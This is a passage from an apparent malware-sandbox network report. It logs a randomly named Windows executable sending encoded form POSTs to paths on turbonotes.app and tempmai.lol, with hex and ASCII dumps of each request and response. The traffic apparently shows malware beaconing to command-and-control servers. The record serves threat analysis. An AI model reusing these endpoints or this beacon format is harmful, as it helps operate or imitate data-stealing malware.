                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.turbonotes.app
                                                                                                                                            Origin: http://www.turbonotes.app
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.turbonotes.app/7u7b/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 37 62 52 45 46 37 73 58 68 63 4d 70 4c 49 30 31 66 45 5a 42 35 42 52 32 37 4c 4b 45 71 54 66 4c 6f 46 33 41 51 6b 32 4f 67 4b 43 4f 68 36 4f 4c 36 52 44 54 4a 4e 46 47 38 71 4f 4d 50 36 32 71 52 6f 6b 4e 44 62 6a 44 63 31 75 41 6b 2b 48 4c 73 35 58 69 72 72 49 63 6f 55 6c 2b 4e 39 34 38 49 73 35 62 5a 48 73 6c 41 47 41 38 6d 39 61 42 30 4e 75 58 6c 4d 51 59 4a 39 31 42 69 34 4d 64 62 4f 32 33 58 47 79 2f 43 66 69 58 55 74 6b 4c 38 46 70 77 67 43 4b 55 48 31 6b 69 73 54 4c 72 74 46 41 63 61 6b 77 57 4f 6d 6b 32 4c 30 68 51 32 75 43 7a 53 78 52 70 6e 41 49 6d 4c 52 59 63 52 42 65 4f 2f 69 4e 32 79 33 32 6b
                                                                                                                                            Data Ascii: 5vc=7bREF7sXhcMpLI01fEZB5BR27LKEqTfLoF3AQk2OgKCOh6OL6RDTJNFG8qOMP62qRokNDbjDc1uAk+HLs5XirrIcoUl+N948Is5bZHslAGA8m9aB0NuXlMQYJ91Bi4MdbO23XGy/CfiXUtkL8FpwgCKUH1kisTLrtFAcakwWOmk2L0hQ2uCzSxRpnAImLRYcRBeO/iN2y32k
                                                                                                                                            Oct 10, 2024 12:53:15.215898991 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:53:15 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                            Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            26192.168.2.661416217.70.184.50805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:16.807169914 CEST797OUTPOST /7u7b/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.turbonotes.app
                                                                                                                                            Origin: http://www.turbonotes.app
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.turbonotes.app/7u7b/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 37 62 52 45 46 37 73 58 68 63 4d 70 4b 6f 45 31 59 6b 6c 42 2f 68 52 78 6e 37 4b 45 67 7a 66 48 6f 46 72 41 51 6c 44 46 68 2b 75 4f 68 65 47 4c 39 51 44 54 4b 4e 46 47 33 4b 4f 56 43 61 32 62 52 6f 6f 46 44 65 44 44 63 78 2b 41 6b 37 6a 4c 73 4f 72 74 71 37 49 43 39 45 6c 34 4a 39 34 38 49 73 35 62 5a 48 34 50 41 47 49 38 6d 4e 4b 42 31 70 62 42 37 63 51 62 4f 39 31 42 6d 34 4d 5a 62 4f 32 56 58 48 75 5a 43 63 61 58 55 6f 41 4c 39 55 70 2f 75 43 4b 53 4a 56 6c 39 36 52 65 51 31 54 42 64 55 33 6b 4b 4f 6c 5a 4d 4f 43 67 4b 71 64 43 51 41 68 78 72 6e 43 51 55 4c 78 59 32 54 42 6d 4f 74 31 42 52 39 44 54 48 6c 45 4a 6b 45 37 68 75 62 50 49 76 66 4f 71 67 63 4b 77 59 78 41 3d 3d
                                                                                                                                            Data Ascii: 5vc=7bREF7sXhcMpKoE1YklB/hRxn7KEgzfHoFrAQlDFh+uOheGL9QDTKNFG3KOVCa2bRooFDeDDcx+Ak7jLsOrtq7IC9El4J948Is5bZH4PAGI8mNKB1pbB7cQbO91Bm4MZbO2VXHuZCcaXUoAL9Up/uCKSJVl96ReQ1TBdU3kKOlZMOCgKqdCQAhxrnCQULxY2TBmOt1BR9DTHlEJkE7hubPIvfOqgcKwYxA==
                                                                                                                                            Oct 10, 2024 12:53:17.472230911 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:53:17 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                            Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            27192.168.2.661417217.70.184.50805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:19.353768110 CEST1810OUTPOST /7u7b/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.turbonotes.app
                                                                                                                                            Origin: http://www.turbonotes.app
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.turbonotes.app/7u7b/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 37 62 52 45 46 37 73 58 68 63 4d 70 4b 6f 45 31 59 6b 6c 42 2f 68 52 78 6e 37 4b 45 67 7a 66 48 6f 46 72 41 51 6c 44 46 68 2b 6d 4f 69 73 65 4c 37 7a 62 54 4c 4e 46 47 36 71 4f 51 43 61 32 43 52 72 59 42 44 65 65 32 63 33 69 41 6c 5a 72 4c 75 36 2f 74 6b 37 49 43 2f 45 6c 39 4e 39 34 70 49 73 70 48 5a 48 6f 50 41 47 49 38 6d 50 43 42 32 39 76 42 38 73 51 59 4a 39 30 41 69 34 4e 4f 62 50 66 69 58 45 43 76 43 73 36 58 55 49 51 4c 2b 6d 42 2f 6d 43 4b 51 4f 56 6c 31 36 52 43 50 31 54 31 37 55 30 34 73 4f 6d 46 4d 4e 6a 67 54 7a 4d 71 79 54 41 56 73 37 56 34 69 49 78 41 47 54 6a 76 7a 39 6d 4a 38 30 6d 33 6b 72 6b 42 68 46 34 49 38 64 39 41 77 59 59 43 78 5a 59 68 4c 74 4e 50 4f 35 66 30 34 48 47 76 4c 75 44 34 36 67 66 74 44 69 46 66 4c 4e 57 58 74 74 5a 59 4b 6b 57 6e 76 59 31 33 53 57 51 58 6c 49 51 2f 39 69 61 33 64 37 44 57 74 54 59 37 48 54 4e 37 50 73 62 6a 52 64 69 36 52 58 72 51 34 66 47 42 5a 54 67 6e 55 61 47 47 6a 6f 42 67 6e 44 79 37 6a 4f 30 70 57 48 31 58 64 37 48 51 59 7a 69 [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=7bREF7sXhcMpKoE1YklB/hRxn7KEgzfHoFrAQlDFh+mOiseL7zbTLNFG6qOQCa2CRrYBDee2c3iAlZrLu6/tk7IC/El9N94pIspHZHoPAGI8mPCB29vB8sQYJ90Ai4NObPfiXECvCs6XUIQL+mB/mCKQOVl16RCP1T17U04sOmFMNjgTzMqyTAVs7V4iIxAGTjvz9mJ80m3krkBhF4I8d9AwYYCxZYhLtNPO5f04HGvLuD46gftDiFfLNWXttZYKkWnvY13SWQXlIQ/9ia3d7DWtTY7HTN7PsbjRdi6RXrQ4fGBZTgnUaGGjoBgnDy7jO0pWH1Xd7HQYziC+g8sL8gQIW1RyXdcfyb5jajK62h6nQow4D1lipvHoHvMdT2kGTu/pOyWkrZsFX0oI1tjlz5htfb0JeiSP/Bpabp4+ZNX80neWUwenoUST+izEehnSiafJjW7sjtdsG1HfOs6oDdRvjyaYmrYHGVxFKzg3XM6Eh3oN4NUrFqYWgAV27sEAbnpX8DmhyYMPVvS8bm3+giOUe12GMA8G+Njf0KAItT0nndi25KfB50SuN5CJ03CvO/ooyyzt8G/3J1ele4cEDa0fhdNHcWkNyxQWLu1/zuKCIs63ZBCm8F05Nu2Nhj70cR07y0lL4vNOMjGyuxh4ph8mDd5Gx0hHbaYyd6NrzUgoUd6aF95Xj5goQsbEStT2AgxNY579bImnw4XQB3p0dQBfhKqCBD93TLGx/Pt00TbQ5FhgKfNFbdIl2pfhxOVAITPJqGipxOTFCOPeRe35ZNKLor7okhU/pFh3eKVomyPjGjhjgPePohmCBowwSkfFpzce9WNNSGoyC7WvtJRBgiPCUXI9d3yWlAQBdMGhIbxh0deZrQA306GgVcw7BlxHXAPVQ4VJGcXC/uJia3nBCS492cKHn0E4liGR7OFOB+ZFCU+GVE/KaLKPiPVB0JPBqGb0tamXFcZ/Ic7vg/+N2CiktwQL/45N4KIzpEutdnIg8prb [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:53:20.093991995 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:53:20 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                            Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            28192.168.2.661418217.70.184.50805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:21.901766062 CEST507OUTGET /7u7b/?lLYL=kvUX&5vc=2Z5kGOkuv5pVGp5caE9S+AlLzK7psx26l1r4OVTTo/mJv8+h8gvJJdoe4aGwZK+fAJooQPvCRx2bg5uJuIXMrI8i6EsIC7ECcfl7eR40SkVxjNn20IyYqrUIILkrtqNDTrCWbBw= HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.turbonotes.app
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:53:22.611449957 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:53:22 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Language
                                                                                                                                            Data Raw: 37 38 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 74 75 72 62 6f 6e 6f 74 65 73 2e 61 70 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d [TRUNCATED]
                                                                                                                                            Data Ascii: 78b<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>turbonotes.app</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://w [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:53:22.611862898 CEST224INData Raw: 72 62 6f 6e 6f 74 65 73 2e 61 70 70 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 74 75 72 62 6f 6e 6f 74 65 73 2e 61 70 70 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74
                                                                                                                                            Data Ascii: rbonotes.app"><strong>View the WHOIS results of turbonotes.app</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"
                                                                                                                                            Oct 10, 2024 12:53:22.611886024 CEST672INData Raw: 3e 3c 70 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 62 6f 72 64 65 72 62 6f 78 5f 31 47 77 62 5f 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 69 6e 66 6f 62 6f 78 5f 44 4d 64 66 74 22 3e
                                                                                                                                            Data Ascii: ><p class="Parking_2023-borderbox_1Gwb_"><span class="Parking_2023-infobox_DMdft"><strong>turbonotes.app</strong><br />is unavailable</span></p></div></div><p class="Parking_2023-linksContainer_19x1c">Want your own domain name?<br/><a href="h


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            29192.168.2.66141945.33.18.44805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:27.817924976 CEST764OUTPOST /m2fa/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.tempmai.lol
                                                                                                                                            Origin: http://www.tempmai.lol
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.tempmai.lol/m2fa/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 51 7a 44 5a 76 37 2f 53 49 6a 4a 57 4d 46 53 39 42 61 55 34 56 65 70 68 50 74 75 4e 79 72 34 65 67 2f 31 53 2b 6f 4f 54 4e 36 6d 30 59 4f 51 76 42 37 37 6a 76 30 43 37 71 5a 56 43 6d 51 4b 2f 62 6c 52 2f 73 69 65 59 72 47 54 59 43 5a 62 46 2f 2f 76 71 30 66 4a 67 70 76 73 41 6a 4d 43 30 70 65 31 79 74 45 58 36 2b 79 63 4e 62 69 37 65 6b 72 43 59 62 6c 62 2f 42 32 44 64 6d 7a 52 36 51 6b 53 43 44 78 56 71 36 7a 69 41 50 43 50 7a 70 69 6b 77 32 2f 52 53 61 6d 4d 58 74 30 51 79 36 33 66 44 45 58 46 36 44 31 5a 47 7a 78 69 59 62 44 6e 73 65 54 44 34 38 44 6a 2b 30 6e 44 69 69 7a 49 4a 66 59 4f 33 6b 53 61 58
                                                                                                                                            Data Ascii: 5vc=QzDZv7/SIjJWMFS9BaU4VephPtuNyr4eg/1S+oOTN6m0YOQvB77jv0C7qZVCmQK/blR/sieYrGTYCZbF//vq0fJgpvsAjMC0pe1ytEX6+ycNbi7ekrCYblb/B2DdmzR6QkSCDxVq6ziAPCPzpikw2/RSamMXt0Qy63fDEXF6D1ZGzxiYbDnseTD48Dj+0nDiizIJfYO3kSaX
                                                                                                                                            Oct 10, 2024 12:53:28.220552921 CEST805INHTTP/1.1 200 OK
                                                                                                                                            server: openresty/1.13.6.1
                                                                                                                                            date: Thu, 10 Oct 2024 10:53:28 GMT
                                                                                                                                            content-type: text/html
                                                                                                                                            transfer-encoding: chunked
                                                                                                                                            content-encoding: gzip
                                                                                                                                            connection: close
                                                                                                                                            Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 da 30 10 bd e7 57 b8 3e 64 da 99 82 8d 09 c1 34 56 3a 84 04 17 c6 1d d2 84 00 e6 92 91 25 81 45 f4 e1 d8 b2 05 d3 e9 7f af 31 99 e0 0c 3d 54 07 4b bb de b7 bb ef ad e4 7d ba 9d 0c a6 e1 fd 9d 11 2b ce ae cf bc fd 66 30 28 d6 c0 24 c2 bc 3e 33 ca e5 c5 04 e2 c3 b1 32 39 51 d0 40 31 4c 33 a2 80 f9 34 1d 36 dc b7 c8 e3 ef 58 a9 a4 41 5e 73 5a 00 73 db c8 61 03 49 9e 40 45 23 46 4c 03 49 a1 88 28 b1 a3 3b 40 f0 9a 9c a0 05 e4 04 98 05 25 3a 91 a9 aa 01 34 c5 2a 06 98 14 14 91 46 65 7c 35 a8 a0 8a 42 d6 c8 10 64 04 b4 9a 76 3d 9d a2 8a 91 6b cf 3a ec 15 9d aa 49 21 33 94 d2 44 1d 69 fd bb f7 94 ac 52 92 c5 b5 16 ec ab 3c 65 60 cf ef 9b 65 69 ad bb 76 53 11 9e 70 48 9b 4c 32 cb 34 ac 63 4e cf 3a ad e3 55 f2 d5 f5 39 ad d1 f9 cf 1a 9e 75 1c 8d 17 49 bc 33 a4 60 12 62 60 62 f9 7c 38 7e fe 52 97 e3 40 da 50 bb a4 d4 57 91 ad b2 36 b0 80 07 6f 2d 6e af c5 2a 17 48 51 29 8c 5a 2a e3 f7 bb 82 fb 90 fd d2 54 60 a9 9b 4a 26 25 7d 54 4e 58 8a 66 5c 32 32 80 [TRUNCATED]
                                                                                                                                            Data Ascii: 265SMs0W>d4V:%E1=TK}+f0($>329Q@1L346XA^sZsaI@E#FLI(;@%:4*Fe|5Bdv=k:I!3DiR<e`eivSpHL24cN:U9uI3`b`b|8~R@PW6o-n*HQ)Z*T`J&%}TNXf\22aE wV:MV~b:nmwnuT1Ia[wK~GA@h0lg|3D?nv XQ%^Q&tf*\vv4Y6!?%~+F6<h*Ui?<nh>^9mB//w5.:Oj"^"t8Ma/| yaD-x_[B0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            30192.168.2.66142045.33.18.44805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:30.431551933 CEST788OUTPOST /m2fa/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.tempmai.lol
                                                                                                                                            Origin: http://www.tempmai.lol
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.tempmai.lol/m2fa/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 51 7a 44 5a 76 37 2f 53 49 6a 4a 57 4e 6d 4b 39 43 35 38 34 53 2b 70 6d 52 39 75 4e 37 4c 34 61 67 2f 70 53 2b 70 4b 44 4e 49 43 30 66 76 67 76 47 2f 76 6a 73 30 43 37 34 35 56 44 37 41 4b 32 62 6c 4d 49 73 6a 69 59 72 47 48 59 43 63 2f 46 38 4f 76 72 31 50 4a 69 76 76 73 43 73 73 43 30 70 65 31 79 74 45 44 63 2b 7a 30 4e 61 52 7a 65 6e 4f 76 4f 41 46 62 2b 57 47 44 64 33 6a 51 78 51 6b 54 58 44 31 55 46 36 78 4b 41 50 44 2f 7a 70 58 51 33 74 50 52 55 56 47 4e 4c 70 67 4a 73 36 42 4f 55 45 57 39 48 55 79 51 69 79 48 6a 43 48 77 6e 50 4d 44 6a 36 38 42 37 4d 30 48 44 49 67 7a 77 4a 4e 50 43 51 72 6d 2f 30 71 78 45 35 64 77 68 6f 66 73 5a 59 67 41 46 2f 76 67 6d 42 44 41 3d 3d
                                                                                                                                            Data Ascii: 5vc=QzDZv7/SIjJWNmK9C584S+pmR9uN7L4ag/pS+pKDNIC0fvgvG/vjs0C745VD7AK2blMIsjiYrGHYCc/F8Ovr1PJivvsCssC0pe1ytEDc+z0NaRzenOvOAFb+WGDd3jQxQkTXD1UF6xKAPD/zpXQ3tPRUVGNLpgJs6BOUEW9HUyQiyHjCHwnPMDj68B7M0HDIgzwJNPCQrm/0qxE5dwhofsZYgAF/vgmBDA==
